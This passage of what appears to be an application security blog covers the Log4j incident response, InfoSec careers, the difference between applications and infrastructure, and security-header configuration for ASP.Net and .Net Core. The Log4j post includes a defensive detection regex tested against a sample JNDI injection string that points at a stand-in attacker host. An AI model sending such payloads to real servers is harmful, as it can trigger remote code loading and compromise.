Some vendors responded very strongly, with Contrast Security giving away a surprise tool (https://www.contrastsecurity.com/security-influencers/instantly-inoculate-your-servers-against-log4j-with-new-open-source-tool ) to help people find log4j on servers. They could likely have charged a small fortune, but they did not. Hats off to them. I also heard of one org that was using the new Wiz.io, apparently it did a very fast inventory for them. I like hearing about good new tools in our industry.

I heard of several vendors whose customers demanded “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool had nothing to do with libraries, so this vulnerability was entirely out of the tool’s scope. This tells me that customers were quite frightened. I mean, I certainly was….

Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.

Those that had a WAF, RASP, or CDN were able to throw up some fancy REGEX and block most requests. Not a perfect or elegant solution, but it saved quite a few companies’ bacon and greatly reduced the risk.
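As a rough sketch of what those emergency rules looked like (the pattern and function names are my own, and real attackers used obfuscated variants like nested lookups that needed fancier handling):

```python
import re

# Rough sketch of an emergency WAF/CDN blocking rule for Log4Shell-style probes.
# Real-world bypasses used nested/obfuscated lookups (e.g. ${${lower:j}ndi:...}),
# so rules like this reduced risk; they did not eliminate it.
LOG4SHELL = re.compile(
    r"\$\{jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|http)://",
    re.IGNORECASE,
)

def should_block(request_value: str) -> bool:
    """Return True if the value looks like a Log4Shell exploit attempt."""
    return bool(LOG4SHELL.search(request_value))

print(should_block("${jndi:ldap://attacker.example/a}"))  # True
print(should_block("normal search query"))                # False
```

This is exactly why it was a shield and not a fix: it filters known-bad input at the edge, while the vulnerable lookup behaviour stays in the application until it is patched.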

I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that is a vulnerability in itself. Log4j proved this like never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly; this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”

Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.

Sharing Another Talk with the Community

Me, delivering this talk for the first time, on stage.

Three years ago I decided that I would share most of my talk content with my community (everything that I am not currently applying to conferences with). At the time, I only shared one, because…. I ran out of time. Now it’s time to share the second talk, “Security is Everybody’s Job!” By “share” I mean give my express permission for anyone, anywhere, to present content that I have written, with no need to pay anything or ask for my consent. You can even charge money to give the talk! Please, just teach people about security.

In an effort to ensure anyone who presents my material has a good experience, I made a GitHub repo with an instructional video of what to say, a readme file with written instructions, and links so you can watch me do the talk myself.

Me, delivering this talk for the first time, on stage, at DevOpsDays Zurich, in beautiful Switzerland.

I’ve had a few people ask me why I would do this, and there are a few reasons.
* To spread the word about how to secure software; it’s important to me to try to make the internet and other technologies safe to use.
* To help new speakers (especially from underrepresented groups). If they have something they can present, with instructions they can follow, hopefully it will help make them more confident and skilled at presenting.
* To share knowledge with my community in general: sharing is caring, yo.
* The more people who present my talk, the more people may decide to follow me. SO MUCH WIN!

You can give this talk at any IT meetup, especially DevOps, InfoSec or any software development meetup.

Please go forth and teach AppSec! And if you have feedback I want to hear it!

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!

Jobs in Information Security (InfoSec)


Almost all of the people who respond to my #CyberMentoringMonday tweets each week say that they want to “get into InfoSec” or “become a Penetration Tester”; they rarely choose any other jobs or are more specific than that. I believe the reason for this is that they are not aware of all the different areas within the field of Information Security (InfoSec for short, and “Cyber” for those outside of our industry). I can sympathize; I was in the same position when I joined. I knew three Penetration Testers and lots of Risk Analysts, and I had no clue that several other areas existed that might interest me. I knew I didn’t want to be a Risk Analyst, so I thought the only other option was PenTester. Now I know that is not true at all. This blog post will detail several other areas within the field of Information Security, in hopes that newcomers to our field can find their niche more easily. It will not be exhaustive, but I’ll do my best.

Image by Henry Jiang of Oppenheimer & Co.

The above image shows 8 different potential areas within the field of Information Security according to the author, Henry Jiang; Governance, Risk, Career Development, User Education, Standards, Threat Intelligence, Security Architecture and Security Operations.

Since I come from the software development side of IT, and have done almost exclusively coding, my view is going to be extremely biased. With that in mind, the first area you may want to consider is Application Security (AppSec); any and all work towards ensuring that software is secure. This is the field that I work in, so it will have the most detail. There are all sorts of jobs within this field, but the most well-known is the web app pentester (sometimes called an ethical hacker); a person who does security testing on software. Such a person is often a consultant, but can also work in large companies. They test one system, intensively, perform a lot of manual testing, and then move on.

Jobs in Application Security:

  • Application Security Engineer — you do a mix of all the things listed under AppSec and you are generally a full-time employee. This includes making custom tools, launching a security champion program, writing guidelines, and anything else that will help ensure the security of your organization’s apps. I personally consider this the sweet spot, as I get to do changing and interesting work, and see the security posture improve over time. It is, however, usually a more senior role.
  • Threat Modeller, working with developers, business representatives and the security team (that’s you in this scenario) to find and document potential threats to your software, then create plans to test for and fix the issues.
  • Vulnerability Assessment: running lots of scans, all the time, of everything. You can scan the network too. Ideally, you will do more than this, to assess the security of the systems in your care, but it depends on where you work. This position is often an employee position and you tend to have prolonged relationships with the systems and teams you assess.
  • Vulnerability Management: keeping track of the vulnerabilities that all the tools and people find, reporting to management about it, and planning from a higher level. For instance: attempting to wipe out an entire bug class, implementing new tools because you see a deficiency, resource planning, etc. This is usually an employee position, and often a manager role or team lead.
  • Secure Code Reviewer: reading lots of code, using SAST (static application security testing) tools and SCA (Software Composition Analysis — are our 3rd party components secure?), finding vulnerabilities in written code and helping developers fix it.
  • DevSecOps Engineer: an AppSec engineer working in a DevOps environment. Same goal, different tactics. Adding security checks to pipelines, figuring out how to secure containers and anything else your DevOps engineers are up to.
  • Developer Education: this is usually a consultant role, but sometimes for large companies, someone can do this full time. The person teaches the developers to write secure code, the architects to design secure apps, threat modelling, and any other topic they can think of that will help ensure their mandate (secure apps). This person is likely also to train the security champions.
  • Governance: writing policies, guidelines, standards, etc., to ensure your apps are secure. This is usually handled by someone who does all the governance work for your org, working with the AppSec team to get the details right, OR by a consultant, because this is not an activity that needs to be redone constantly.
  • Incident Response: this area includes jobs as an incident manager (you boss everyone around and make sure the incident goes as smoothly as possible), and investigations (Forensics/DFIR). Investigating incidents related to insecure software is a topic I personally find thrilling; detective work is exciting! But with the stress it causes, it’s not for everyone.
  • Security Testing: often called Penetration Testing, sometimes called Red Teaming, sometimes not officially recognized as a job because management isn’t “ready” to admit they need this yet. This person tests the software (and sometimes networks) to ensure they are secure. This includes manual testing, using lots of tools, and trying to break things without causing a huge mess.
  • Design Review: this is usually the job of a “Security Architect”, but AppSec folks are often asked to review designs for potential security flaws. If asked, say yes! It’s super fun and always educational. Bonus: it’s a good way to build trust between security and the developers.
  • In AppSec you will also be asked to do a range of other things, because that’s how life is. Potential asks: install this giant AppSec tool and figure out how it works, create a proof of concept for an exploit to show everyone that it is/is not a problem, create a proof of value with a new AppSec tool we are considering acquiring, get all the developers to log their apps like ‘so’ so that the SIEM can read the results, research how to do something securely when you have no idea how to do that thing at all, etc. As I said, it’s super fun!
ISACA Victoria, Dec 2019

Security Architect (apps, cloud, network): Security architects ensure that designs are secure. This can mean reviewing a deployment, network or application design, adding recommendations, or even creating the design themselves from scratch. This tends to be a more senior role.

SOC Analyst/Threat Hunter: SOC analysts interpret output from the monitoring tools to try to tell if something bad is happening, while threat hunters go looking for trouble. This is mostly network-based, and I’m not good at networks; otherwise I would have been all over this when I moved into security. The idea of threat hunting (using data and patterns to spot problems) is very appealing to my metric-adoring brain. Note: SOC Analyst is a junior or intermediate position and threat hunter is not, but if you want to get into InfoSec they are basically always hiring SOC Analysts, at almost every company.

Risk Analyst: Evaluate systems to identify and measure risk to the business, then offer recommendations on how to mitigate or when to accept the risks. This tends to be coupled closely with Compliance, and Auditing, which I won’t describe here because I am shamefully under-educated in this area.

Security Policy Writer: Writing policies about security, such as how long network passwords need to be, that all public-facing web apps must be available via HTTPS, and that only TLS 1.2 and higher are acceptable on your network. Deciding, writing, socializing and enforcing these policies are all part of this role.

Malware Analyst/Reverse Engineer: Someone needs to look at malware and figure out how it works, and sometimes people need to write exploits (for legitimate reasons, such as to prove that something is indeed vulnerable, or… You need to ask them). If you enjoy puzzles and really low-level programming (such as ARM, assembler, etc), this job might be for you. But be careful; playing with malware at home is dangerous.

Chief Information Security Officer (CISO or CSO): “The boss” of security. This person (hopefully) has a seat at the executive table, directs all security aspects for a company, and is the person held responsible, for better or for worse. If you enjoy running programs, managing things from a high level, and making a big difference, this might be a role for you.

Blue Team/Defender/Security Engineer (enterprise security/implements security tools): The people that keep us safe! These people install tools, run the tools, monitor, patch, and freak out when people download and install things to their desktops without asking. They perform security operations, making sure all the things happen, while those in the SOC (Security Operations Centre) monitor everything that’s happening and respond when there are problems.

There are many, many, many jobs within the field of Information Security, please feel free to list some of the ones that I missed in the comments below. I hope this information helps more of you join our industry because we need all the help we can get!

The Difference Between Applications and Infrastructure


Recently someone asked me what the difference was between applications and infrastructure. He asked why a Linux operating system wasn’t “software”, and I said it was, but it’s a perfect copy (the same for everyone who installs it); when I talk about applications, I tend to mean ‘custom software’. We ended up talking for a very long time about it, and I thought a blog post was in order.

Photo by Christian Wiediger on Unsplash

Infrastructure is the operating systems and hardware that applications live on. Think Windows, Linux, containers, and so much more. Sometimes hardware is included in this category (depending on who you talk to), and sometimes it is not. Infrastructure is necessary to run an application; even serverless runs (briefly) on a container. Operating systems are also standardized, not unique in nature. For instance, if I’m running SQL Server 2012 R2, and so are you, we both have the same options for patches, configuration, etc. Operating systems are software that speak to hardware.

Applications are software that speak to operating systems, databases, APIs, and anything else you can think of. There are custom applications (what I’m almost always talking about: software developed for a specific business need or as a product to sell), COTS (commercial off-the-shelf software, like SharePoint or Confluence, administered by a person or team, installed locally on a server), and regular old software that you install or access via a web browser and use as-is (no administration required/simpler). More recently there is SaaS, software as a service, which is basically a great big COTS product hosted by someone else (no need for you to patch or otherwise take care of it; you pick your settings and use it).

Infrastructure usually needs to be patched, updated/upgraded, and hardened (secure configuration choices). Patches and upgrades arrive in a prepackaged format, but sometimes these updates can break the applications living on that infrastructure. Testing, and sometimes downtime, is required. This is why so many people say ‘patching is hard’: it is difficult to plan for testing and downtime and to ensure everything will go smoothly.

Software, on the other hand, includes many different components that are provided prepackaged (such as a new version of a library or a framework), but when you update them, sometimes other libraries or framework parts break, and/or the custom code that your team wrote can break as well. Meaning you may need to re-code or rewrite things, or update a whole bunch of things at the same time. I’ve heard developers refer to this as “dependency hell”.
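As a hypothetical illustration (the package names are invented), a Python requirements file can show the kind of deadlock developers mean by that phrase:

```
# requirements.txt (hypothetical packages): upgrading library-a to fix a
# vulnerability forces shared-lib 3.x, but library-b still pins shared-lib 2.x,
# so the dependency resolver cannot satisfy both at once.
library-a==2.0   # requires shared-lib>=3.0
library-b==1.4   # requires shared-lib<3.0
```

The way out is usually updating (or replacing) the second library as well, which is exactly the cascade of extra work described above.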

If you have just released something brand new, it’s super easy to keep it up to date. Tiny changes present less risk (which is why people love DevOps over waterfall), making it easier to maintain. But because it’s sparkling and new… usually management says “hey, please build this new feature, and update that library later”. This is how technical debt accrues. It’s not operational staff or software developers saying “forget that, I don’t care about this”; it’s almost always conflicting priorities.

I hope this helps clarify the difference.

Discoveries as a Result of the Log4j Debacle

Me, pre-log4j. Happier times, before I knew anything about log4j.

Over the past 2 weeks, many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular log4j Java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have been upgrading, removing libraries, and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.

​Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…

Although I have already posted in my newsletter, on this blog, and on my YouTube channel, I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years, that need to change.

After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.

Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.

You are amazing. Thank you for your service.

Let’s get into some systemic problems.

Inventory: Not just for Netflix Anymore

I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having a current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams whom I admire. If they find it hard, how can smaller companies with fewer resources get it done? While responding to this incident, this problem has never been more obvious.

Look at past me! No idea what was about to hit her, happily celebrating her new glasses.

​Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:

  • Public Repos that should have been private
  • Every type of cloud-based version control or code repo you can think of; GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
  • On-prem, saved to a file server – some with backups and some without
  • In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
  • SVN (Subversion), ClearCase, SourceSafe, and other repos I thought no one was using anymore… that are incompatible with the AppSec tools I (and many others) had at hand.

Having it take over a week just to get access to all the various places the code is kept, meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.

Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.
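For concreteness, an SBOM is just structured data about your dependencies. A minimal fragment in the CycloneDX format (one of the common SBOM standards) looks roughly like this; the component shown is illustrative:

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {
      "type": "library",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

With a file like this for every app, answering “are we affected?” becomes a search rather than a week of archaeology.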

Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know your assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of the fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.

We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working folks. This is a systemic problem in our industry.

Lack of Support and Governance for Open-Source Libraries

This may or may not be the biggest issue, but it is certainly the most talked-about throughout this situation. The question most often posed is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.

Lack of Tooling Coverage

The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS); that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access, or has access but the incorrect set of rights? There are dozens of reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.

Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **
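The quick-and-dirty search I describe above can be sketched like this (a snapshot-in-time check of a downloaded code tree, with a function name of my own invention, and definitely not a substitute for a real SCA tool):

```python
import os

def find_log4j_references(root: str) -> list[str]:
    """Walk a checked-out code tree and flag any file whose name mentions log4j.

    A crude snapshot-in-time check: it catches bundled jars like
    log4j-core-2.14.1.jar, but not transitive dependencies that are only
    declared in build files.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if "log4j" in name.lower():
                hits.append(os.path.join(dirpath, name))
    return hits
```

In practice you would also grep build files (pom.xml, build.gradle, and friends) for log4j coordinates, since the library may be pulled in transitively rather than shipped as a jar in the repo.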

But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.

Undeployed Code

This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), the project was paused, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common, it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.

Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, if it’s paused, just an example, is it deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?
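To make the idea concrete, here is a hypothetical, minimal code-inventory record; the field names are my own invention, not an industry standard. Even something this small would let you flag code that is “paused” or “archived” yet still sitting in production:

```python
# A toy inventory: every repo gets an entry stating its status and
# where it is actually deployed. (Field names are illustrative only.)
REPO_MANIFEST = [
    {"repo": "billing-api", "status": "active", "deployed_to": ["prod", "staging"]},
    {"repo": "legacy-reports", "status": "paused", "deployed_to": ["prod"]},
    {"repo": "holiday-demo", "status": "archived", "deployed_to": []},
]

def suspicious_entries(manifest):
    """Flag code that is not active but is still deployed to production."""
    return [
        entry["repo"]
        for entry in manifest
        if entry["status"] != "active" and "prod" in entry["deployed_to"]
    ]
```

Run against the sample manifest above, this would flag "legacy-reports": paused, yet still in prod, which is exactly the situation I kept finding.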

Lack of Incident Response/Investigation Training

Many people I spoke to who were part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, who had no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. Honestly, I’ve not had nearly as much training as I would like, with most of what I’ve learned coming from on-the-job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.

The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening: multiple people giving quotes to the media, to customers, or to other teams; conflicting status reports going to management. If you take one thing away from this article, it should be that you really need to speak with one voice when the crap hits the fan….

No Shields

For those attempting to protect very old applications (for instance, any apps using log4j 1.X versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery Network) like CloudFlare, behind a WAF (Web Application Firewall), or behind a RASP (Runtime Application Self-Protection tool).

Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.

Ancient Dependencies

Several teams I advised had what I would call “Ancient Dependencies”: dependencies so old that the application would require re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why Log4J is going to take a very, very long time to square away.

Technical debt is security debt.

– Me

Solutions Needed

I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.

Security Headers for ASP.Net and .Net CORE

Website report showing we received an A

For those who do not follow me or Franziska Bühler, we have an open source project together called OWASP DevSlop in which we explore DevSecOps through writing vulnerable apps, creating pipelines, publishing proof of concepts, and documenting what we’ve learned on our YouTube Channel and our blogs. In this article we will explore adding security headers to our proof of concept website, DevSlop.co. This blog post is closely related to Franziska’s post OWASP DevSlop’s journey to TLS and Security Headers. If you like this one, read hers too. 🙂

Franziska Bühler and I installed several security headers during the OWASP DevSlop Show in Episodes 22.1 and 2.2. Unfortunately, we found out that .Net Core apps don’t have a web.config, so the next time we published, it wiped out the beautiful headers we had added. Although that was not good news, it was another chance to learn, and it gave me a great excuse to finally write the Security Headers blog post that I have been promising. Here we go!

Our web.config looked so…. Empty.

Just now, I added back the headers but I added them to the startup.cs file in my .Net Core app, which you can watch here. Special thanks to Damien Bod for help with the .Net Core twist.

If you want in-depth details about what we did on the show and what each security header means, you should read Franziska’s blog post. She explains every step, and if you are trying to add security headers for the first time to your web.config (ASP.Net, not .Net CORE), you should definitely read it.

The new code for ASP.Net in your web.config looks like this:

<!-- Start Security Headers -->
<httpProtocol>
  <customHeaders>
    <add name="X-XSS-Protection" value="1; mode=block"/>
    <add name="Content-Security-Policy" value="default-src 'self'"/>
    <add name="X-Frame-Options" value="SAMEORIGIN"/>
    <add name="X-Content-Type-Options" value="nosniff"/>
    <add name="Referrer-Policy" value="strict-origin-when-cross-origin"/>
    <remove name="X-Powered-By"/>
  </customHeaders>
</httpProtocol>
<!-- End Security Headers -->

Our new-and-improved Web.Config!

And the new code for my startup.cs (.Net CORE), looks like this (Thank you Damien Bod):

//Security headers make me happy
app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());
app.UseXContentTypeOptions();
app.UseReferrerPolicy(opts => opts.NoReferrer());
app.UseXXssProtection(options => options.EnabledWithBlockMode());
app.UseXfo(options => options.Deny());

// Content-Security-Policy: everything restricted to our own origin,
// with inline styles allowed (the site's CSS needs them)
app.UseCsp(opts => opts
    .BlockAllMixedContent()
    .StyleSources(s => s.Self().UnsafeInline())
    .FontSources(s => s.Self())
    .FormActions(s => s.Self())
    .FrameAncestors(s => s.Self())
    .ImageSources(s => s.Self())
    .ScriptSources(s => s.Self())
);
//End Security Headers

Our beautiful security headers!

In future episodes we will also add:

  • Secure settings for our cookies
  • X-Permitted-Cross-Domain-Policies: none
  • Expect-CT: (not currently supported by our provider)
  • Feature-Policy: camera ‘none’; microphone ‘none’; speaker ‘self’; vibrate ‘none’; geolocation ‘none’; accelerometer ‘none’; ambient-light-sensor ‘none’; autoplay ‘none’; encrypted-media ‘none’; gyroscope ‘none’; magnetometer ‘none’; midi ‘none’; payment ‘none’; picture-in-picture ‘none’; usb ‘none’; vr ‘none’; fullscreen *;

For more information on all of these security headers, I strongly suggest you read the OWASP Security Headers Guidance.

We now have good marks from all of the important places (https://securityheaders.com, https://www.ssllabs.com and http://hardenize.com), but hope to improve our score even further.
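If you want a quick local check of the same thing those sites grade, a few lines of code can do a first pass. This is an illustrative Python sketch (mine, not affiliated with securityheaders.com); the header list mirrors the ones added in this post:

```python
# Recommended response headers, matching the ones configured in this post.
RECOMMENDED = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Referrer-Policy",
]

def missing_security_headers(response_headers):
    """Given a dict of response headers, return the recommended
    security headers that are absent (header names are case-insensitive)."""
    present = {name.lower() for name in response_headers}
    return [h for h in RECOMMENDED if h.lower() not in present]
```

You could feed it the headers from any HTTP client response (for example, the header dict returned by your favorite requests library) and get back a to-do list of missing protections.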

For more information, watch our show! Every Sunday from 1–2 pm EDT, on Mixer and Twitch, and recordings are available later on our YouTube channel.

Please use every security header that is available and applicable to you.

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!